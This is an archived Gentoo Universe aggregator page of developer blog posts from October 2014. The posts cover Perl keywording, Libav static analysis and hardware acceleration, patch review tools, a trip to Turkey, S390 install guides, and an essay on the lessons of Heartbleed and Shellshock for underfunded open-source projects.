
Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Zack Medico

Last updated:
October 24, 2014, 21:05 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

October 19, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Here's a small piece of advice for all who want to upgrade their Perl to the very newest available, but still keep running an otherwise stable Gentoo installation: These three lines are exactly what needs to go into /etc/portage/package.keywords:
dev-lang/perl
virtual/perl-*
perl-core/*
Of course, as always, bugs may be present; what you get as Perl installation is called unstable or testing for a reason. We're looking forward to your reports on our bugzilla.
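
For illustration, here is a minimal sketch of how that could look in practice; the file name under package.keywords and the emerge/perl-cleaner invocations below are my own assumptions, not part of the original advice:

# /etc/portage/package.keywords/perl  (hypothetical file name; a plain
# /etc/portage/package.keywords file works just as well)
# listing an atom with no keyword accepts its ~arch (testing) version
dev-lang/perl
virtual/perl-*
perl-core/*

# then pull in the testing Perl and rebuild the installed modules
emerge --ask --update --deep dev-lang/perl
perl-cleaner --all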

Sven Vermeulen a.k.a. swift (homepage, bugs)
Lots of new challenges ahead (October 19, 2014, 14:01 UTC)

I’ve been pretty busy lately, albeit mostly behind the scenes, which has led to lower activity within the free software communities that I’m active in. Still, I’m not planning any exit, quite the contrary. Lots of ideas are just waiting for some free time to take up. So what are the challenges that have been taking up my time?

One of them is that I recently moved. And with moving comes a lot of work in getting the place into a good shape and getting settled. Today I finished the last job that I wanted to finish in my apartment in a short amount of time, so that’s one thing off my TODO list.

Another one is that I started an intensive master-after-master programme with the subject of Enterprise Architecture. This not only takes up quite some ex-cathedra time, but also additional hours of studying (and for the moment also exams). But I’m really satisfied that I can take up this course, as I’ve been wandering around in the world of enterprise architecture for some time now and want to grow even further in this field.

But that’s not all. One of my side activities has been blooming a lot, and I recently reached the 200th server that I’m administering (although I think this number will reduce to about 120 as I’m helping one organization with handing over management of their 80+ systems to their own IT staff). Together with some friends (who also have non-profit customers’ IT infrastructure management as their side-business) we’re now looking at consolidating our approach to system administration (and engineering).

I’m also looking at investing time and resources in a start-up, depending on the business plan and required efforts. But more information on this later when things are more clear :-)

October 18, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Fix ALL the BUGS! (October 18, 2014, 12:12 UTC)

Vittorio started (with some help from me) to fix all the issues pointed out by Coverity.

Static analysis

Coverity (and scan-build) are quite useful for spotting mistakes, even if their false-positive ratio tends to be quite high. Even the false positives are usually interesting, since they spot code that is unnecessarily convoluted. The code should be as simple as possible, but not simpler.

The basic idea behind those tools is to try to follow the code paths while compiling them and spot what could go wrong (e.g. you are feeding a NULL to a function that would dereference it).

The problems with this approach are usually two: false positives due to the limited scope of the analyzer and false negatives due to shadowing.

False Positives

Coverity might assume certain inputs are valid even if they are made impossible by some initial checks earlier in the code flow.

In those cases you should spend enough time to make sure Coverity is not right and that those faulty inputs aren’t slipping in somewhere. NEVER just add some checks to the code it points at as a first move; you might end up hiding real issues (e.g. if Coverity complains about an uninitialized variable, do not just initialize it to some empty value; check why it happens and whether the logic behind it is wrong).

If Coverity is confused, your compiler is confused as well and will produce suboptimal executables. Properly fixing those issues can result in useful speedups. Simpler code is usually faster.

Ever increasing issue count

While fixing issues using those tools you might notice to your surprise that every time you fix something, something new appears out of thin air.

This is not magic but simply that the static analyzers usually keep some limit on how deep they go, depending on the issues already present and how much time has been spent already.

That surprise has been fun, since apparently some of the time limit is per compilation unit, so splitting large files into smaller chunks gets us more results (while speeding up the build process thanks to better parallelism).

Usually fixing some high-impact issue gets us three to five new small-impact issues.

I like solving puzzles, so I do not mind the extra fun; sadly I have not had much spare time to play this game lately.

Merge ALL the FIXES

Properly fixing all the issues is a lofty goal, and as usual having a patch is just half of the work. Two sets of eyes work better than one, and an additional brain with different expertise can prevent a good chunk of mistakes. The review process is the other, sometimes neglected, half of solving issues.

So far 100+ patches have piled up over the past weeks, and now they are being sent in small batches to ease the work of review. (I have something brewing to make reviewing simpler, as you might know.)

During the review probably about one in ten patches will be rejected and the corresponding Coverity report updated with enough information to explain why it is a false positive or why the dangerous or strange behaviour it points at is intentional.

The fixes will be part of the next point releases for our 4 maintained major releases: 0.8, 9, 10 and 11. Many thanks to the volunteers who spend their free time keeping all the branches up to date!

Tracking patches (October 18, 2014, 11:53 UTC)

You need good tools to do a good job.

Even the best tool in the hand of a novice is a club.

I’m quite fond of improving the tools I use. And that’s why I started getting involved in Gentoo, Libav, VLC and plenty of other projects.

I have already discussed lldb and asan/valgrind; my current focus is patch trackers, in part due to the current effort to improve the libav one.

Contributors

Before talking about patches and their tracking I’d like to digress a little on who produces them. The mythical Contributor: without contributions an opensource project would not exist.

You might have recurring contributions and unique/seldom contributions. Both are quite important.
In general you should try to turn occasional contributors into recurring contributors.

A recurring contributor may accept spending some additional time to set up the environment needed to actually provide contributions back to the community; a sporadic contributor can easily be put off if the effort required to send a patch is larger than writing the patch itself.

The project maintainers should make the life of contributors as simple as possible.

Patches and Revision Control

Lately most opensource projects have seen the light and started to use decentralized revision control systems, and thanks to github and many others the concept of issuing pull requests is becoming part of our culture; with it hopefully comes a wider acceptance of the fact that code should be reviewed before it is merged.

Pull Request

In a decentralized development scenario new code is usually developed in topic branches, routinely rebased against master until the set is ready, and then the set of changes (called a series or patchset) is reviewed and, after some rounds of fixes, eventually merged. Thanks to bitbucket we now have forking, spooning and knifing as part of the jargon.

The review (and merge) step, quite properly, is called knifing (or stabbing): you have to dice, slice and polish the code before merging it.

Reviewing code

During a review, bugs are usually spotted and ways to improve are suggested. Patches might be split or merged together and the series reworked and improved a lot.

The process is usually time-consuming, even more so for an organization made of volunteers: writing code is fun, addressing the issues spotted is not so much, and reviewing someone else’s code even less.

Sadly it is a necessary annoyance, since otherwise the errors (and horrors) that slip through would be much bigger and probably much more numerous. If you do not care about code quality and what you are writing is not used by other people, you can probably ignore all that; otherwise you should feel somewhat concerned that what you wrote might turn some people’s lives into a sea of pain. (On the other hand, some gratitude for such a daunting effort is usually welcome.)

Pull request management

The old-fashioned way to issue a pull request is either to poke somebody, telling them that your branch is ready for merging, or to just make a set of patches and mail them to whoever is in charge of integrating code into the main branch.

git provides a nifty tool to do that, called git send-email, and it is quite common to send sets of patches (usually called series) to a mailing list. You get feedback by email and you can send updates to the set using the --in-reply-to option and the message id.
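
As a rough sketch of that workflow (the list address and message id below are made up for the example):

# send the last three commits as a series to the list
git send-email --to=patches@example.org -3

# after addressing the review comments, regenerate the series as v2
# and thread it under the original discussion via its Message-Id
git format-patch -v2 -3 -o v2/
git send-email --to=patches@example.org \
    --in-reply-to='<20141018120000.1234@example.org>' v2/*.patch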

Platforms such as github and similar are more web centric and require you to use the web interface to issue and review the request. No additional tools are required beside your git and a browser.

gerrit and reviewboard provide custom scripts to set up ephemeral branches in some staging area; the review process then requires a browser again. Every commit gets some tool-specific metadata to ease tracking changes across series revisions. This approach is the most setup-intensive.

Pros and cons

Mailing list approach

Testing patches from the mailing list is quite simple thanks to git am. And if the in-reply-to field is used properly, updates appear sorted in a sensible way.
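
A minimal sketch of testing such a series locally (the mbox file name and branch names are just examples):

# save the series from your mail client (or patchwork) as an mbox,
# apply it on a throwaway branch and build/test from there
git checkout -b test-series origin/master
git am series.mbox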

This method is the simplest for people used to having an email client always open next to a console (if they are using a well-configured emacs or vim they literally never move away from the editor).

On the other hand, people using a webmail or using a basic email client might find the approach more cumbersome than a web based one.

If your only method to track contributions is just a mailing list, it gets quite easy to forget the status of a set. Patches can be neglected, and even the people who wrote them might forget about them for a long time.

Patchwork approach

Patchwork tracks which patches hit a mailing list and tries to figure out automatically whether they eventually get merged.

It is quite basic: it provides a web interface to check the status and a means to update the patch status. The review must happen on the mailing list and there is no concept of series.

As basic as it is, it works as a reminder about pending patches, but it tends to get cluttered easily and keeping it clean requires some effort.

Github approach

The web interface makes it much easier to spot what is pending and what its status is; people used to having everything in the browser (chrome and mozilla could be made to work as a decent IDE lately) might like it much better.

Reviewing small series or single patches is usually nicer but the current UIs do not scale for larger (5+) patchsets.

People not living in a browser find it quite annoying to switch context, and it requires additional effort to contribute since you have to register on a website; the process of issuing a patch requires many additional steps, while the email approach just requires typing git send-email -1.

Gerrit approach

The gerrit interfaces tend to be richer than the Github counterparts. That can be good or bad since they aren’t as immediate and tend to overwhelm new contributors.

You need to make an additional effort to set up your environment since you need some custom scripts.

The series are tracked with additional precision, but for all practical usage it is the same as github, with an additional burden for the contributor.

Introducing plaid

Plaid is my attempt to tackle the problem. It is currently unfinished and in dire need of more hands working on it.

Its basic concept is to be as non-intrusive as possible, retaining all the pros of the simple git+email workflow, as Patchwork does.

It already provides additional features such as the ability to manage series of patches and to track updates to them. It sports a view giving a breakdown of which series require a review and which have been pending for a long time waiting for an update.

What’s pending is adding the ability to review directly in the browser, to send the review email from the web to the mailing list, and some more.

I might complete it within the year or by next spring; if you like Flask or Python, contributions are warmly welcome!

October 17, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
My ideal editor (October 17, 2014, 19:03 UTC)

Notepad Art
Photo credit: Stephen Dann

Some of you probably read me ranting on G+ and Twitter about blog post editors. I have been complaining about that since at least last year when Typo decided to start eating my drafts. After that almost meltdown I decided to look for alternatives on writing blog posts, first with Evernote – until they decided to reset everybody's password and required you to type some content from one of your notes to be able to get the new one – and then with Google Docs.

I have indeed kept using Google Docs until recently, when it started having some issues with dead keys. Because I have been using US International layout for years, and I'm too used to it when I write English too. If I am to use a non-deadkeys keyboard, I end up adding spaces where they shouldn't be. So even if it solves it by just switching the layout, I wouldn't want to write a long text with it that way.

Then I decided to give another try to Evernote, especially as the Samsung Galaxy Note 10.1 I bought last year came with a yet-to-activate 12 months subscription to the Pro version. Not that I find anything extremely useful in it, but…

It all worked well for a while until they decided to throw me into the new Beta editor, which follows all the newest trends in blog editors. Yes because there are trends in editors now! Away goes the full-width editing, instead you have a limited-width editing space in a mostly-white canvas with disappearing interface, like node.js's Ghost and Medium and now Publify (the new name of what used to be Typo).

And here's my problem: while I understand that they try to make things that look neat and that supposedly are there to help you "focus on writing" they miss the point quite a bit with me. Indeed, rather than having a fancy editor, I think Typo needs a better drafting mechanism that does not puke on itself when you start playing with dates and other similar details.

And Evernote's new editor is not much better; indeed last week, while I was in Paris, I decided to take half an afternoon to write about libtool – mostly because J-B has been facing some issues and I wanted to document the root causes I encountered – and after two hours of heavy writing, I got to Evernote, and the note is gone. Indeed it asked me to log back in. And I logged in that same morning.

When I complained about that on Twitter, the amount of snark and backward thinking I got surprised me. I was expecting some trolling, but I had people seriously suggesting me that you should not edit things online. What? In 2014? You've got to be kidding me.

But just to make that clear, yes I have used offline editing for a while in the past, as Typo's editor has been overly sensitive to changes too many times. But it does not scale. I'm not always on the same device: not only do I have three computers in my own apartment, but I have two more at work, and then I have tablets. It is not uncommon for me to start writing a post on one laptop, then switch to the other – for instance because I need access to the smartcard reader to read some data – or to start writing a blog post while at a conference with my work laptop, and then finish it in my room on the personal one, and so on and so forth.

Yes I could use Dropbox for out-of-band synchronization, but its handling of conflicts is not great, if you end up having one of the devices offline by mistake — better than the effects of it on password syncs but not so much better. Indeed I have bad experiences with that, because it makes it too easy to start working on something completely offline, and then forget to resync it before editing it from a different service.

Other suggestions included (again) the use of statically generated blogs. I have said before that I don't care for them and I don't want to hear them as suggestions. First they suffer from the same problems stated above with working offline, and secondly they don't really support comments as first class citizens: they require services such as Disqus, Google+ or Facebook to store the comments, including it in the page as an external iframe. I not only don't like the idea of farming out the comments to a different service in general, but I would be losing too many features: search within the blog, fine-grained control over commenting (all my blog posts are open to comment, but it's filtered down with my ModSecurity rules), and I'm not even sure they would allow me to import the current set of comments.

I wonder why, instead of playing with all the CSS and JavaScript to make the interface disappear, the editors' developers don't invest time to make the drafts bulletproof. Client-side offline storage should allow for preserving data even in case of being logged out or losing network connection. I know it's not easy (or I would be writing it myself) but it shouldn't be impossible, either. Right now it seems the bling is what everybody wants to work on, rather than functionality — it probably is easier to put in your portfolio, and that could be a good explanation as any.

October 15, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into this documentary today…

https://archive.org/details/TheInternetsOwnBoyTheStoryOfAaronSwartz

October 14, 2014
Jan Kundrát a.k.a. jkt (homepage, bugs)

Some of the recent releases of Trojitá, a fast Qt e-mail client, mentioned an ongoing work towards bringing the application to the Ubuntu Touch platform. It turns out that this won't be happening.

The developers who were working on the Ubuntu Touch UI decided that they would prefer to stop working with upstream and instead focus on a standalone long-term fork of Trojitá called Dekko. The fork lives within the Launchpad ecosystem and we agreed that there's no point in keeping unmaintained and dead code in our repository anymore -- hence it's being removed.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
One month in Turkey (October 14, 2014, 20:35 UTC)

Our latest roadtrip was as amazing as it was challenging because we decided that we’d spend an entire month in Turkey and use our own motorbike to get there from Paris.

Transportation

Our main idea was to spare ourselves from the long hours of road riding to Turkey so we decided from the start to use ferries to get there. Turns out that it’s pretty easy as you have to go through Italy and Greece before you set foot in Bodrum, Turkey.

  • Paris -> Nice : train
  • Nice -> Parma (IT) -> Ancona : road, (~7h drive)
  • Ancona -> Patras (GR) : ferry (21h)
  • Patras -> Piraeus (Athens) : road (~4h drive, constructions)
  • Piraeus -> Kos : ferry (~11h by night)
  • Kos -> Bodrum (TR) : ferry (1h)

Turkish customs are very friendly and polite, it’s really easy to get in with your own vehicle.

Tribute to the Nightster

This roadtrip added 6000 km to our brave and astonishing Harley-Davidson Nightster. We encountered no problems at all with the bike even though we clearly didn’t go easy on her. We rode on gravel, dirt and mud without her complaining, not to mention the weight of our luggage and the passengers ;)

That’s why this post will be dedicated to our bike and I’ll share some of the photos I took of it during the trip. The real photos will come in some other posts.

A quick photo tour

I can’t describe well enough the pleasure and feeling of freedom you get when travelling by motorbike, so I hope these first photos will give you an idea.

I have to admit that it’s really impressive to leave your bike alone between the numerous trucks parking, loading/unloading their stuff a few centimeters from it.

IMG_20140905_130004

We arrived in Piraeus easily, time to buy tickets for the next boat to Kos.

IMG_20140906_164101  IMG_20140906_191845

Kos is quite a big island that you can discover best by… riding around!

IMG_20140907_121148

After Bodrum, where we only spent the night, you quickly discover the true nature of Turkish roads and scenery. Animals are everywhere and sometimes on the road such as those donkeys below.

IMG_20140909_180844

This is a view from the Bozburun bay. Two photos for two bike layouts: beach version and fully loaded version ;)

IMG_20140909_191337 IMG_20140910_112858

On the way to Cappadocia, near Karapinar:

IMG_20140918_142943

The amazing landscapes of Cappadocia; after two weeks by the sea it felt cold up there.

IMG_20140920_140433 IMG_20140920_174936 IMG_20140921_130308

Our last picture from the bike next to the trail leading to our favorite and lonely “private” beach on the Datça peninsula.

IMG_20140925_182326

October 13, 2014
Raúl Porcel a.k.a. armin76 (homepage, bugs)
S390 documentation in the Gentoo Wiki (October 13, 2014, 08:44 UTC)

Hi all,

One of the projects I had last year that I ended up suspending due to lack of time was S390 documentation and installation materials. For some reason there weren’t any materials available to install Gentoo on an S390 system without having to rely on an already installed distribution.

Thanks to Marist College, IBM and the Linux Foundation we were able to get two VMs for building the release materials, and thanks to Dave Jones @ V/Soft Software I was able to document the installation in a z/VM environment. Also thanks to the Debian project, since I based the materials on their procedure.

So for most of last year and over the last few weeks I’ve been polishing and finishing the documentation I had around. What I’ve documented: Gentoo S390 on the Hercules emulator and Gentoo S390 on z/VM. Both are based on the same pattern.

Gentoo S390 on the Hercules emulator

This is probably the more interesting guide, because everyone can run the Hercules emulator, while not everyone has access to a z/VM instance. Hercules emulates an S390 system; it’s like QEMU. However QEMU, from what I can tell, is unable to emulate an S390 system on a non-S390 system, while Hercules can.

So if you want to have some fun and emulate an S390 machine on your computer, and install and use Gentoo in it, then follow the guide: https://wiki.gentoo.org/wiki/S390/Hercules

Gentoo S390 on z/VM

For those that have access to z/VM and want to install Gentoo, the guide explains all the steps needed to get a Gentoo system working. Thanks to Dave Jones I was able to create the guide and test the release materials; he even did a presentation at the 2013 VM Workshop! Link to the PDF. Keep in mind that some of the instructions given there are now outdated, mainly the links.

The link to the documentation is: https://wiki.gentoo.org/wiki/S390/Install

I have also written some tips and tricks for z/VM: https://wiki.gentoo.org/wiki/S390/z/VM_tips_and_tricks They’re really basic and were the ones I needed for creating the guide.

Installation materials

Lastly, we already had the autobuild stage3s for s390, but we lacked the boot environment for installing Gentoo. This boot environment/release material is simply a kernel and an initramfs built with Gentoo’s genkernel, based on busybox. It builds an environment using busybox like the livecd on amd64/x86 or other architectures. I’ve integrated the build of these boot environments with the autobuilds, so each week there should be an updated installation environment.

Have fun!


October 11, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
VDD14 Discussions: HWAccel2 (October 11, 2014, 14:47 UTC)

I took part in the Videolan Dev Days 14 some weeks ago; sadly I have been too busy, so the posts about it will appear in scattered order and somewhat delayed.

Hardware acceleration

In multimedia, video is basically crunching numbers to get pixels or crunching pixels to get numbers. Most of the operations are quite time-consuming on a general-purpose CPU and orders of magnitude faster if done using a DSP or hardware designed for that purpose.

Availability

Most of the commonly used systems have video decoding and encoding capabilities either embedded in the GPU or in separate hardware. Leveraging them spares lots of CPU cycles, and lots of battery if we are thinking about mobile.

Capabilities

The usually specialized hardware has the issue of being inflexible, and that clashes with the fact that most codecs evolve quite quickly, with additional profiles to extend their capabilities, support different color spaces, use additional encoding strategies and such. Software decoders and encoders are still needed, and needed badly.

Hardware acceleration support in Libav

HWAccel 1

The hardware acceleration support in Libav grew (like other eldritch-horror tentacular code we have lurking from our dark past) without much direction, addressing short-term problems and not really documenting how to use it.

As a result, all the people that dared to use it had to guess, usually used internal symbols that they shouldn’t have had to use, and all in all had to spend lots of time and endure plenty of grief when such internals changed.

Usage

Every backend required a quite large deal of boilerplate code to initialize the backend-specific context and to render the hardware surface wrapped in the AVFrame.

The Libav backend interface was quite vague in itself, requiring get_format and get_buffer to be overridden in certain ways.

Overall, to get the whole thing working the library user was supposed to do about 75% of the work. Not really nice, considering people use libraries to abstract complexity and avoid repetition.

Backend support

As that support was written with just slice-based decoders in mind, it expects that all backends require the software decoder to parse the bitstream, prepare slices of the frame and feed them to the backend.

Sadly, new backends appeared that directly take either the bitstream or full frames; the approach so far had been just to take the slice, add back the bitstream markers the backend library expects and be done with it.

Initial HWAccel 2 discussion

Last year, since the backends I wanted to support were all bitstream-oriented and did not fit the model at all, I started thinking about it, and the topic got discussed a bit during VDD 13. Some people who had spent their dear time getting hwaccel1 working with their software were quite wary of radical changes, so a path of incremental improvements was more or less laid down.

HWAccel 1.2

  • default functions to allocate and free the backend context, and making the struct interfacing between Libav and the backend extensible without causing breakage.
  • avconv can now use some hwaccels, providing at least an example of how to use them and a means to test without having to gut VLC or mpv to experiment.
  • better documentation for the old-style hwaccels, so at least some mistakes can be avoided (and some code that happens to work by sheer luck won’t break once the faulty assumptions cease to hold).

The new VDA backend and the updated VDPAU backend are examples of it.

HWAccel 1.3

  • extend the callback system to decently fit bitstream-oriented backends.
  • provide an example of backend directly providing normal AVFrames.

The Intel QSV backend is used as a testbed for hwaccel 1.3.

The future of HWAccel2

Another year, another meeting. We sat down again to figure out how to get closer to the end result: not having casual users write boilerplate code to use hwaccel and get at least some performance boost, while still letting power users have full access to the underpinnings so they can get the most out of it without having to write everything from scratch.

Simplified usage, hopefully really simple

The user just needs to use AVOption to set specific keys such as hwaccel and optionally hwaccel-device and the library will take care of everything. The frames returned by avcodec_decode_video2 will contain normal system memory and commonly used pixel formats. No further special code will be needed.

Advanced usage, now properly abstracted

All the default initialization, memory/surface allocation and such will remain overridable, with the difference that an additional callback called get_hw_surface will be introduced to separate completely the hwaccel path from the software path and specific functions to hand over the ownership of backend contexts and surfaces will be provided.

The software fallback won’t be automagic anymore in this case; instead a specific AVERROR_INPUT_CHANGED will be returned, so it will be cleaner for the user to reset the decoder without losing the display that might have been sharing the same context. This leads the way to a simpler means of supporting multiple hwaccel backends and falling back from one to the other and eventually to software decoding.

Migration path

We try our best to help people move to the new APIs.

Moving from HWAccel1 to HWAccel2 would in general result in fewer lines of code in the application; people wanting to keep their callbacks just need to set them after avcodec_open2 and move the pixel-specific get_buffer to get_hw_surface. The presence of av_hwaccel_hand_over_frame and av_hwaccel_hand_over_context will make managing the backend-specific resources much simpler.

Expected Time of Arrival

Right now the review is on HWAccel 1.3; I hope to complete this step and add a few new backends to test how good or bad that API is before adding the other steps. HWAccel2 will probably take at least another 6 months.

Help in form of code or just moral support is always welcome!

Mike Pagano a.k.a. mpagano (homepage, bugs)
Netflix on Gentoo (October 11, 2014, 13:11 UTC)

Contrary to some articles you may read on the internet, NetFlix is working great on Gentoo.

Here’s a snapshot of my system running 3.12.30-gentoo sources and Google Chrome version 39.0.2171.19_p1.

netflix

$ equery l google-chrome-beta
* Searching for google-chrome-beta …
[IP-] [ ] www-client/google-chrome-beta-39.0.2171.19_p1:0

October 08, 2014
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v1.6 (October 08, 2014, 09:01 UTC)

Back from holidays, this new version of py3status was long overdue as it features a lot of great contributions!

This version is dedicated to the amazing @ShadowPrince who contributed 6 new modules :)

Changelog

  • core : rename the ‘examples’ folder to ‘modules’
  • core : Fix include_paths default wrt issue #38, by Frank Haun
  • new vnstat module, by Vasiliy Horbachenko
  • new net_rate module, alternative module for tracking network rate, by Vasiliy Horbachenko
  • new scratchpad-counter module and window-title module for displaying current windows title, by Vasiliy Horbachenko
  • new keyboard-layout module, by Vasiliy Horbachenko
  • new mpd_status module, by Vasiliy Horbachenko
  • new clementine module displaying the current “artist – title” playing in Clementine, by François LASSERRE
  • module clementine.py: Make python3 compatible, by Frank Haun
  • add optional CPU temperature to the sysdata module, by Rayeshman

Contributors

Huge thanks to this release’s contributors:

  • @ChoiZ
  • @fhaun
  • @rayeshman
  • @ShadowPrince

What’s next?

The next 1.7 release of py3status will bring a neat and cool feature which I’m sure you’ll love. Stay tuned!

October 07, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
Two types of respect mixed up by Linus Torvalds (October 07, 2014, 19:59 UTC)

I recently ran into the Q&A with Linus Torvalds @ Debconf 2014 video.

During the session, Torvalds is being criticized for lack of respect and replies that ~”respect is to be earned”. Technically, he confuses respect as in admiration with respect as in dignity. Simplified, he is saying that human dignity does not matter to him. Linus, I’m fairly disappointed.

October 06, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
How to stop Bleeding Hearts and Shocking Shells (October 06, 2014, 21:35 UTC)

Heartbleed logo
The free software community was recently shattered by two security bugs called Heartbleed and Shellshock. While technically these bugs were quite different, I think they still share a lot.

Heartbleed hit the news in April this year. A bug in OpenSSL allowed attackers to extract private keys of encrypted connections. When a bug in Bash called Shellshock hit the news I was at first hesitant to call it bigger than Heartbleed. But now I am pretty sure it is. While Heartbleed was big, there were some things that alleviated the impact. It took some days till people found out how to practically extract private keys - and it still wasn't fast. And the most likely attack scenario - stealing a private key and pulling off a Man-in-the-Middle attack - seemed something that'd still pose some difficulties to an attacker. It seemed that people who update their systems quickly (like me) weren't in any real danger.

Shellshock was different. It's astonishingly simple to use and real attacks started hours after it became public. If circumstances had been unfortunate there would've been a very real chance that my own servers could've been hit by it. I usually feel the IT stuff under my responsibility is pretty safe, so things like this scare me.

What OpenSSL and Bash have in common

Shortly after Heartbleed something became very obvious: The OpenSSL project wasn't in good shape. The software that pretty much everyone on the Internet uses to do encryption was run by a small number of underpaid people. People trying to contribute and submit patches were often ignored (I know that, I tried it). The truth about Bash looks even grimmer: It's a project mostly run by a single volunteer. And yet almost every large Internet company out there uses it. Apple installs it on every laptop. OpenSSL and Bash are crucial pieces of software and run on the majority of the servers that run the Internet. Yet they are very small projects backed by few people. Besides, they are both quite old; you'll find tons of legacy code in them written more than a decade ago.

People like to rant about the code quality of software like OpenSSL and Bash. However I am not that concerned about these two projects. This is the upside of events like these: OpenSSL is probably much more secure than it ever was, and after the dust settles Bash will be a better piece of software. If you want to ask yourself where the next Heartbleed/Shellshock-like bug will happen, ask this: What projects are there that are installed on almost every Linux system out there? And how many of them have a healthy community and received a good security audit lately?

Software installed on almost any Linux system

Let me propose a little experiment: Take your favorite Linux distribution, make a minimal installation without anything and look at what's installed. These are the software projects you should worry about. To make things easier I did this for you. I took my own system of choice, Gentoo Linux, but the results wouldn't be very different on other distributions. The results are at the bottom of this text. (I removed everything Gentoo-specific.) I admit this is oversimplifying things. Some of these provide more attack surface than others; we should probably worry more about the ones that are directly involved in providing network services.
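
As a sketch of how to reproduce that list on a Gentoo box (qlist comes from app-portage/portage-utils; other distributions have their own equivalents such as dpkg -l or rpm -qa):

# every installed package, one per line
qlist -I

# or, without extra tools, straight from the package database
ls -d /var/db/pkg/*/* | cut -d/ -f5-6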

After Heartbleed some people already asked questions like these. How could it happen that a project so essential to IT security is so underfunded? Some large companies acted and the result is the Core Infrastructure Initiative by the Linux Foundation, which has already helped improve OpenSSL development. This is a great start and an example of the kind of initiative we should have more of. We should ask the large IT companies who are not part of that initiative what they are doing to improve overall Internet security.

Just to put this into perspective: A thorough security audit of a project like Bash would probably require a five figure number of dollars. For a small, volunteer driven project this is huge. For a company like Apple - the one that installed Bash on all their laptops - it's nearly nothing.

There's another recent development I find noteworthy. Google started Project Zero where they hired some of the brightest minds in IT security and gave them a single job: Search for security bugs. Not in Google's own software. In every piece of software out there. This is not merely an altruistic project. It makes sense for Google. They want the web to be a safer place - because the web is where they earn their money. I like that approach a lot and I have only one question to ask about it: Why doesn't every large IT company have a Project Zero?

Sparking interest

There's another aspect I want to talk about. After Heartbleed people started having a closer look at OpenSSL and found a number of small issues and one other quite severe one. After the Bash bug people instantly found more issues in the function parser and we now have six CVEs for Shellshock and friends. When a piece of software is affected by a severe security bug people start to look for more. I wonder what it'd take to have people looking at the projects that aren't in the spotlight.

I was brainstorming whether we could have something like a "free software audit action day". A regular call where an important but neglected project is chosen and the security community is asked to have a look at it. This is just a vague idea for now; if you like it please leave a comment.

That's it. I refrain from having discussions whether bugs like Heartbleed or Shellshock disprove the "many eyes"-principle that free software advocates like to cite, because I think these discussions are a pointless waste of time. I'd like to discuss how to improve things. Let's start.

Here's the promised list of Gentoo packages in the standard installation:

bzip2
gzip
tar
unzip
xz-utils
nano
ca-certificates
mime-types
pax-utils
bash
build-docbook-catalog
docbook-xml-dtd
docbook-xsl-stylesheets
openjade
opensp
po4a
sgml-common
perl
python
elfutils
expat
glib
gmp
libffi
libgcrypt
libgpg-error
libpcre
libpipeline
libxml2
libxslt
mpc
mpfr
openssl
popt
Locale-gettext
SGMLSpm
TermReadKey
Text-CharWidth
Text-WrapI18N
XML-Parser
gperf
gtk-doc-am
intltool
pkgconfig
iputils
netifrc
openssh
rsync
wget
acl
attr
baselayout
busybox
coreutils
debianutils
diffutils
file
findutils
gawk
grep
groff
help2man
hwids
kbd
kmod
less
man-db
man-pages
man-pages-posix
net-tools
sed
shadow
sysvinit
tcp-wrappers
texinfo
util-linux
which
pambase
autoconf
automake
binutils
bison
flex
gcc
gettext
gnuconfig
libtool
m4
make
patch
e2fsprogs
udev
linux-headers
cracklib
db
e2fsprogs-libs
gdbm
glibc
libcap
ncurses
pam
readline
timezone-data
zlib
procps
psmisc
shared-mime-info

October 04, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)

